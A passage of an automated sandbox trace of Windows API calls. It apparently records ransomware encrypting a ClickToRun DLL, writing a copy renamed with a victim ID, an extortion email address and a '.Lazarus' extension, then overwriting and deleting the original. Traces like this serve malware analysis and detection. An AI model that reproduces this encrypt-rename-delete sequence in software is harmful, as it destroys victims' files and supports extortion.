InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.744] AreFileApisANSI () returned 1 [0089.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.744] GetFileType (hFile=0x360) returned 0x1 [0089.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.745] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.745] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.745] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.745] CloseHandle (hObject=0x360) returned 1 [0089.745] AreFileApisANSI () returned 1 [0089.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.745] GetFileType (hFile=0x360) returned 0x1 [0089.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.746] CloseHandle (hObject=0x360) returned 1 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0089.747] AreFileApisANSI () returned 1 [0089.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.747] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0)) returned 1 [0089.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.747] AreFileApisANSI () returned 1 [0089.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0089.748] GetLastError () returned 0x0 [0089.748] SetLastError (dwErrCode=0x0) [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0089.748] GetLastError () returned 0x0 [0089.748] SetLastError (dwErrCode=0x0) [0089.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f428 [0089.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0089.748] AreFileApisANSI () returned 1 [0089.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0089.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x13a) returned 0x4e568 [0089.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f428, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=157 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 157 [0089.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.749] GetFileType (hFile=0x360) returned 0x1 [0089.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.749] AreFileApisANSI () returned 1 [0089.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.750] GetFileType (hFile=0x418) returned 0x1 [0089.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0089.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.830] GetLastError () returned 0x0 [0089.839] SetLastError (dwErrCode=0x0) [0089.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.839] GetLastError () returned 0x0 [0089.839] SetLastError (dwErrCode=0x0) [0089.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.857] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0089.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0089.859] GetLastError () returned 0x0 [0089.859] SetLastError (dwErrCode=0x0) [0089.859] GetLastError () returned 0x0 [0089.859] SetLastError (dwErrCode=0x0) [0089.859] GetLastError () returned 0x0 [0089.860] SetLastError (dwErrCode=0x0) [0089.860] GetLastError () returned 0x0 [0089.860] SetLastError (dwErrCode=0x0) [0089.860] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.860] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.861] GetLastError () returned 0x0 [0089.861] SetLastError (dwErrCode=0x0) [0089.861] GetLastError () returned 0x0 [0089.861] SetLastError (dwErrCode=0x0) [0089.861] GetLastError () returned 0x0 [0089.861] SetLastError (dwErrCode=0x0) [0089.861] GetLastError () returned 0x0 [0089.861] SetLastError (dwErrCode=0x0) [0089.861] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.862] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.862] GetLastError () returned 0x0 [0089.862] SetLastError (dwErrCode=0x0) [0089.862] GetLastError () returned 0x0 [0089.862] SetLastError (dwErrCode=0x0) [0089.862] GetLastError () returned 0x0 [0089.862] SetLastError (dwErrCode=0x0) [0089.862] GetLastError () returned 0x0 [0089.862] SetLastError (dwErrCode=0x0) [0089.862] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.863] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.863] GetLastError () returned 0x0 [0089.863] SetLastError (dwErrCode=0x0) [0089.863] GetLastError () returned 0x0 [0089.863] SetLastError (dwErrCode=0x0) [0089.863] GetLastError () returned 0x0 [0089.863] SetLastError (dwErrCode=0x0) [0089.863] GetLastError () returned 0x0 [0089.863] SetLastError (dwErrCode=0x0) [0089.863] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.863] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.864] GetLastError () returned 0x0 [0089.864] SetLastError (dwErrCode=0x0) [0089.864] GetLastError () returned 0x0 [0089.864] SetLastError (dwErrCode=0x0) [0089.864] GetLastError () returned 0x0 [0089.864] SetLastError (dwErrCode=0x0) [0089.864] GetLastError () returned 0x0 [0089.864] SetLastError (dwErrCode=0x0) [0089.864] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xc0, lpOverlapped=0x0) returned 1 [0089.864] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.864] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.865] GetLastError () returned 0x0 [0089.865] SetLastError (dwErrCode=0x0) [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0089.865] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xc0, lpOverlapped=0x0) returned 1 [0089.865] GetLastError () returned 0x0 [0089.865] SetLastError (dwErrCode=0x0) [0089.865] GetLastError () returned 0x0 [0089.865] SetLastError (dwErrCode=0x0) [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0089.865] CloseHandle (hObject=0x360) returned 1 [0089.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.867] CloseHandle (hObject=0x418) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0089.867] AreFileApisANSI () returned 1 [0089.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.867] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.868] GetFileType (hFile=0x418) returned 0x1 [0089.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.869] GetLastError () returned 0xb7 [0089.869] SetLastError (dwErrCode=0xb7) [0089.869] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.870] CloseHandle (hObject=0x418) returned 1 [0089.870] AreFileApisANSI () returned 1 [0089.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0089.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0089.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0089.870] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, 